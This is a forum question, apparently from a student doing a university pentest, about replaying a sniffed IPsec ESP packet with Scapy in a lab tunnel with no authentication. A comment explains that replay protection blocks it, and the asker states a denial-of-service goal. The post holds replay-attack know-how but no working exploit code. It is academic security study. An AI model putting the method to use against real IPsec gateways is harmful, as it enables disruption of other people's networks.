1

I'm trying to pentest an IPSEC implementation with no Auth in Tunnel mode for a Uni Project. After sniffing an ESP packet (which contains an ICMP) with Wireshark, the attacker sends the same packet with Scapy to Host A. The problem is that the Router A do not forward anything to his Host A.

I am also using Scapy with the ESP implementation from https://github.com/secdev/scapy

This is My Configuration:

HOST A: 10.0.1.10

ROUTER A NIC-1: 10.0.1.24
ROUTER A NIC-2: 192.168.100.1

HOST B: 10.0.2.10

ROUTER B NIC-1: 10.0.2.24
ROUTER B NIC-2: 192.168.100.2

ATTACKER: 192.168.100.3

after I use sendp from the ATTACKER machine, i see the ESP packet on Router A

06:03:03.088236 IP 192.168.100.2 > Tirith: ESP(spi=0xc18c8ed9,seq=0x1b), length 120

sadly, it doesn't happen anything on HOST A.

I can do the same thing without the ESP,with a simple ICMP packet, everything works: Router A gets the packet and forward to HOST A, so it seems that the interface is also set correctly. Am I missing something here?

Kuze
  • 41
  • 1
  • 6
  • 1
    Does Router A use replay protection? Did you change the sequence number? The latter will only work if there really is no integrity protection (although ESP without it is rarely used, if at all). – ecdsa Dec 11 '20 at 09:14
  • Yeah it was the replay protection that I forgot, I have momentarily deactivated and it works. Now I have to figure how to change it with Scapy. That's what I'm trying to achieve by the way: A Denial-of-Service attack on a host behind a IPSEC gateway without integrity protection, to prove the vulnerability of encryption-only protocols. – Kuze Dec 11 '20 at 15:42

0 Answers0